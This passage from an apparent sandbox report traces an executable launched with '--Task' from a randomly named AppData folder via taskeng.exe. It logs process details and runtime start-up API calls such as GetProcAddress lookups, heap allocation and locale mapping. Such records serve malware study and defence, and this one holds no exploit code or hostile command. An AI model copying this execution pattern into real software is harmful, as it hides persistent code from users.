[0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 72 os_tid = 0xa78 Thread: id = 73 os_tid = 0xa7c Thread: id = 74 os_tid = 0xa80 Thread: id = 75 os_tid = 0xa84 Thread: id = 76 os_tid = 0xa88 Thread: id = 77 os_tid = 0xa8c Thread: id = 78 os_tid = 0xa90 Process: id = "13" image_name = "penelop0611_2019-11-06_10-30.exe_.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe" page_root = "0x4a6f0000" os_pid = "0xa94" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0xa74" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --Task" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 117 os_tid = 0xa98 [0055.484] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x1e5785b0, dwHighDateTime=0x1d5956a)) [0055.484] GetCurrentThreadId () returned 0xa98 [0055.484] GetCurrentProcessId () returned 0xa94 [0055.484] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=17569487948) returned 1 [0055.532] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7714fd35, hStdError=0x771b7daf)) [0055.532] GetProcessHeap () returned 0x740000 [0055.533] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0055.533] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0055.533] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0055.533] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0055.533] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0055.533] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0055.533] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventExW") returned 0x76cb410b [0055.533] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreExW") returned 0x76cb4195 [0055.533] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadStackGuarantee") returned 0x76c3d31f [0055.533] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolTimer") returned 0x76c4ee7e [0055.533] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolTimer") returned 0x7717441c [0055.533] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7719c50e [0055.533] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolTimer") returned 0x7719c381 [0055.533] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolWait") returned 0x76c4f088 [0055.533] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolWait") returned 0x771805d7 [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolWait") returned 0x7719ca24 [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="FlushProcessWriteBuffers") returned 0x77150b8c [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7720fde8 [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessorNumber") returned 0x771a1e1d [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalProcessorInformation") returned 0x76cb4761 [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSymbolicLinkW") returned 0x76cacd11 [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLocalesEx") returned 0x76cb424f [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringEx") returned 0x76cb46b1 [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="GetDateFormatEx") returned 0x76cc6676 [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoEx") returned 0x76cb4751 [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="GetTimeFormatEx") returned 0x76cc65f1 [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLocaleName") returned 0x76cb47c1 [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidLocaleName") returned 0x76cb47e1 [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0055.534] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentPackageId") returned 0x0 [0055.535] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount64") returned 0x76c4eee0 [0055.535] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0055.535] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0055.535] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x3bc) returned 0x751ef0 [0055.535] GetCurrentThreadId () returned 0xa98 [0055.535] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x18) returned 0x750868 [0055.535] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x800) returned 0x7522b8 [0055.535] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405695, hStdOutput=0x8bb0c22, hStdError=0x0)) [0055.535] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0055.535] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0055.535] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0055.535] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --Task" [0055.536] GetEnvironmentStringsW () returned 0x752ac0* [0055.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0055.536] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x565) returned 0x753598 [0055.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x753598, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0055.536] FreeEnvironmentStringsW (penv=0x752ac0) returned 1 [0055.536] GetLastError () returned 0x7f [0055.536] SetLastError (dwErrCode=0x7f) [0055.536] GetLastError () returned 0x7f [0055.536] SetLastError (dwErrCode=0x7f) [0055.536] GetLastError () returned 0x7f [0055.536] SetLastError (dwErrCode=0x7f) [0055.536] GetACP () returned 0x4e4 [0055.536] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x220) returned 0x753b08 [0055.536] GetLastError () returned 0x7f [0055.536] SetLastError (dwErrCode=0x7f) [0055.536] IsValidCodePage (CodePage=0x4e4) returned 1 [0055.536] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fedc | out: lpCPInfo=0x18fedc) returned 1 [0055.536] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9a4 | out: lpCPInfo=0x18f9a4) returned 1 [0055.536] GetLastError () returned 0x7f [0055.536] SetLastError (dwErrCode=0x7f) [0055.536] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0055.536] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f728, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0055.536] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9b8 | out: lpCharType=0x18f9b8) returned 1 [0055.536] GetLastError () returned 0x7f [0055.536] SetLastError (dwErrCode=0x7f) [0055.536] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0055.536] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0055.537] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0055.537] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0055.537] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fcb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¢\r»\x08ôþ\x18", lpUsedDefaultChar=0x0) returned 256 [0055.537] GetLastError () returned 0x7f [0055.537] SetLastError (dwErrCode=0x7f) [0055.537] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0055.537] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0055.537] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0055.537] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0055.537] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fbb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¢\r»\x08ôþ\x18", lpUsedDefaultChar=0x0) returned 256 [0055.537] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4ad2e0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe")) returned 0x76 [0055.537] GetLastError () returned 0x0 [0055.537] SetLastError (dwErrCode=0x0) [0055.537] GetLastError () returned 0x0 [0055.537] SetLastError (dwErrCode=0x0) [0055.537] GetLastError () returned 0x0 [0055.537] SetLastError (dwErrCode=0x0) [0055.537] GetLastError () returned 0x0 [0055.537] SetLastError (dwErrCode=0x0) [0055.537] GetLastError () returned 0x0 [0055.537] SetLastError (dwErrCode=0x0) [0055.537] GetLastError () returned 0x0 [0055.537] SetLastError (dwErrCode=0x0) [0055.537] GetLastError () returned 0x0 [0055.537] SetLastError (dwErrCode=0x0) [0055.537] GetLastError () returned 0x0 [0055.537] SetLastError (dwErrCode=0x0) [0055.537] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.538] SetLastError (dwErrCode=0x0) [0055.538] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] SetLastError (dwErrCode=0x0) [0055.539] GetLastError () returned 0x0 [0055.539] 